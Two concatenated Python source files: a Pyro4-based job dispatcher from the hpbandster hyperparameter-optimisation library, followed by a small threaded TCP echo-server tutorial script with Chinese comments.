self.proxy = Pyro4.Proxy(uri)
self.runs_job = None
def is_alive(self):
try:
self.proxy._pyroReconnect(1)
except Pyro4.errors.ConnectionClosedError:
return False
except:
raise
return(True)
def shutdown(self):
self.proxy.shutdown()
def is_busy(self):
return(self.proxy.is_busy())
def __repr__(self):
return(self.name)
class Dispatcher(object):
"""
The dispatcher is responsible for assigning tasks to free workers, reporting results back to the master, and
communicating with the nameserver.
"""
def __init__(self, new_result_callback, run_id='0',
ping_interval=10, nameserver='localhost',
nameserver_port=None,
host=None, logger=None, queue_callback=None):
"""
Parameters
----------
new_result_callback: function
function that will be called with a `Job instance <hpbandster.core.dispatcher.Job>`_ as argument.
From the `Job` the result can be read and e.g. logged.
run_id: str
unique run_id associated with the HPB run
ping_interval: int
how often to ping for workers (in seconds)
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
logger: logging.Logger
logger-instance for info and debug
queue_callback: function
gets called with the number of workers in the pool on every update-cycle
"""
self.new_result_callback = new_result_callback
self.queue_callback = queue_callback
self.run_id = run_id
self.nameserver = nameserver
self.nameserver_port = nameserver_port
self.host = host
self.ping_interval = int(ping_interval)
self.shutdown_all_threads = False
if logger is None:
self.logger = logging.getLogger('hpbandster')
else:
self.logger = logger
self.worker_pool = {}
self.waiting_jobs = queue.Queue()
self.running_jobs = {}
self.idle_workers = set()
self.thread_lock = threading.Lock()
self.runner_cond = threading.Condition(self.thread_lock)
self.discover_cond = threading.Condition(self.thread_lock)
self.pyro_id = "hpbandster.run_%s.dispatcher" % self.run_id
def run(self):
with self.discover_cond:
t1 = threading.Thread(
target=self.discover_workers, name='discover_workers')
t1.start()
self.logger.info(
'DISPATCHER: started the \'discover_worker\' thread')
t2 = threading.Thread(target=self.job_runner, name='job_runner')
t2.start()
self.logger.info('DISPATCHER: started the \'job_runner\' thread')
self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
uri = self.pyro_daemon.register(self, self.pyro_id)
ns.register(self.pyro_id, uri)
self.logger.info("DISPATCHER: Pyro daemon running on %s" %
(self.pyro_daemon.locationStr))
self.pyro_daemon.requestLoop()
with self.discover_cond:
self.shutdown_all_threads = True
self.logger.info('DISPATCHER: Dispatcher shutting down')
self.runner_cond.notify_all()
self.discover_cond.notify_all()
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
ns.remove(self.pyro_id)
t1.join()
self.logger.debug('DISPATCHER: \'discover_worker\' thread exited')
t2.join()
self.logger.debug('DISPATCHER: \'job_runner\' thread exited')
self.logger.info('DISPATCHER: shut down complete')
def shutdown_all_workers(self, rediscover=False):
with self.discover_cond:
for worker in self.worker_pool.values():
worker.shutdown()
if rediscover:
time.sleep(1)
self.discover_cond.notify()
def shutdown(self, shutdown_workers=False):
if shutdown_workers:
self.shutdown_all_workers()
with self.runner_cond:
self.pyro_daemon.shutdown()
@Pyro4.expose
@Pyro4.oneway
def trigger_discover_worker(self):
# time.sleep(1)
self.logger.info("DISPATCHER: A new worker triggered discover_worker")
with self.discover_cond:
self.discover_cond.notify()
def discover_workers(self):
self.discover_cond.acquire()
sleep_interval = 1
while True:
self.logger.debug('DISPATCHER: Starting worker discovery')
update = False
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
worker_names = ns.list(
prefix="hpbandster.run_%s.worker." % self.run_id)
self.logger.debug("DISPATCHER: Found %i potential workers, %i currently in the pool." % (
len(worker_names), len(self.worker_pool)))
for wn, uri in worker_names.items():
if not wn in self.worker_pool:
w = Worker(wn, uri)
if not w.is_alive():
self.logger.debug(
'DISPATCHER: skipping dead worker, %s' % wn)
continue
update = True
self.logger.info(
'DISPATCHER: discovered new worker, %s' % wn)
self.worker_pool[wn] = w
# check the current list of workers
crashed_jobs = set()
all_workers = list(self.worker_pool.keys())
for wn in all_workers:
# remove dead entries from the nameserver
if not self.worker_pool[wn].is_alive():
self.logger.info(
'DISPATCHER: removing dead worker, %s' % wn)
update = True
# todo: check if there were jobs running on that worker that need to be rescheduled
current_job = self.worker_pool[wn].runs_job
if not current_job is None:
self.logger.info(
'Job %s was not completed' % str(current_job))
crashed_jobs.add(current_job)
del self.worker_pool[wn]
self.idle_workers.discard(wn)
continue
if not self.worker_pool[wn].is_busy():
self.idle_workers.add(wn)
# try to submit more jobs if something changed
if update:
if not self.queue_callback is None:
self.discover_cond.release()
self.queue_callback(len(self.worker_pool))
self.discover_cond.acquire()
self.runner_cond.notify()
for crashed_job in crashed_jobs:
self.discover_cond.release()
self.register_result(
crashed_job, {'result': None, 'exception': 'Worker died unexpectedly.'})
self.discover_cond.acquire()
self.logger.debug('DISPATCHER: Finished worker discovery')
# if (len(self.worker_pool == 0 ): # ping for new workers if no workers are currently available
# self.logger.debug('No workers available! Keep pinging')
# self.discover_cond.wait(sleep_interval)
# sleep_interval *= 2
# else:
self.discover_cond.wait(self.ping_interval)
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: discover_workers shutting down')
self.runner_cond.notify()
self.discover_cond.release()
return
def number_of_workers(self):
with self.discover_cond:
return(len(self.worker_pool))
def job_runner(self):
self.runner_cond.acquire()
while True:
while self.waiting_jobs.empty() or len(self.idle_workers) == 0:
self.logger.debug('DISPATCHER: jobs to submit = %i, number of idle workers = %i -> waiting!' %
(self.waiting_jobs.qsize(), len(self.idle_workers)))
self.runner_cond.wait()
self.logger.debug('DISPATCHER: Trying to submit another job.')
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: job_runner shutting down')
self.discover_cond.notify()
self.runner_cond.release()
return
job = self.waiting_jobs.get()
wn = self.idle_workers.pop()
worker = self.worker_pool[wn]
self.logger.debug('DISPATCHER: starting job %s on %s' %
(str(job.id), worker.name))
job.time_it('started')
worker.runs_job = job.id
worker.proxy.start_computation(self, job.id, **job.kwargs)
job.worker_name = wn
self.running_jobs[job.id] = job
self.logger.debug('DISPATCHER: job %s dispatched on %s' %
(str(job.id), worker.name))
def submit_job(self, id, **kwargs):
self.logger.debug('DISPATCHER: trying to submit job %s' % str(id))
with self.runner_cond:
job = Job(id, **kwargs)
job.time_it('submitted')
self.waiting_jobs.put(job)
self.logger.debug(
'DISPATCHER: trying to notify the job_runner thread.')
self.runner_cond.notify()
@Pyro4.expose
@Pyro4.callback
@Pyro4.oneway
def register_result(self, id=None, result=None):
self.logger.debug('DISPATCHER: job %s finished' % (str(id)))
with self.runner_cond:
self.logger.debug('DISPATCHER: register_result: lock acquired')
# fill in missing information
job = self.running_jobs[id]
job.time_it('finished')
job.result = result['result']
job.exception = result['exception']
self.logger.debug('DISPATCHER: job %s on %s finished' %
(str(job.id), job.worker_name))
self.logger.debug(str(job))
# delete job
del self.running_jobs[id]
# label worker as idle again
try:
self.worker_pool[job.worker_name].runs_job = None
self.worker_pool[job.worker_name].proxy._pyroRelease()
self.idle_workers.add(job.worker_name)
# notify the job_runner to check for more jobs to run
self.runner_cond.notify()
except KeyError:
# happens for crashed workers, but we can just continue
pass
except:
raise
# call users callback function to register the result
# needs to be with the condition released, as the master can call
# submit_job quickly enough to cause a dead-lock
self.new_result_callback(job)
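# Minimal usage sketch (added as a comment; everything except the Dispatcher API
# defined above is hypothetical). A master process typically provides a callback
# for finished jobs, runs the dispatcher in a background thread, and hands work
# over via submit_job():
#
#     import threading
#
#     def on_result(job):                      # receives a finished Job instance
#         print(job.id, job.result, job.exception)
#
#     dispatcher = Dispatcher(new_result_callback=on_result, run_id='0',
#                             nameserver='localhost')
#     t = threading.Thread(target=dispatcher.run, name='dispatcher', daemon=True)
#     t.start()
#     dispatcher.submit_job(('iter0', 0, 0), config={'x': 1.0}, budget=9)
#     ...
#     dispatcher.shutdown(shutdown_workers=True)
#
# This assumes a running Pyro4 nameserver and workers registered under
# "hpbandster.run_<run_id>.worker."; it is a sketch, not part of the original module.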
|
c4.py
|
"""
服务端
服务器进程要先绑定一个端口监听其他客户端的请求连接
如果请求过来了,服务器与其建立连接,进行通信
服务器一般使用固定端口(80)监听
为了区分socket连接是和哪个客户端进程般的,所以需要4个参数去区分:
1. 服务器地址 2. 客户端地址 3. 服务端端口 4 客户端端口
"""
import socket
import threading
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind the address
s.bind(('127.0.0.1', 8000))
# start listening
s.listen(5) # maximum number of queued connections
print('Waiting for connections...')
# accept client connections
def process_tcp(sock, addr):
print('new connection from %s:%s' % (addr))
sock.send(b'welcome my home')
while True:
# handle the request
data = sock.recv(1024)
time.sleep(1)
if not data:
break
sock.send(b'hello %s' % data)
sock.close()
print('connection from %s:%s closed' % addr)
while True:
# accept a new connection
sock, addr = s.accept()
# spawn a new thread to handle the TCP connection
t = threading.Thread(target=process_tcp, args=(sock, addr))
t.start()
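# A matching client sketch (not part of the original file; added for illustration).
# It connects to the echo server above, reads the welcome message, sends a few
# names, and prints the replies:
#
#     import socket
#
#     c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     c.connect(('127.0.0.1', 8000))
#     print(c.recv(1024))              # b'welcome my home'
#     for name in [b'Alice', b'Bob']:
#         c.send(name)
#         print(c.recv(1024))          # b'hello Alice', then b'hello Bob'
#     c.close()                        # server sees empty data and closes the connection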
|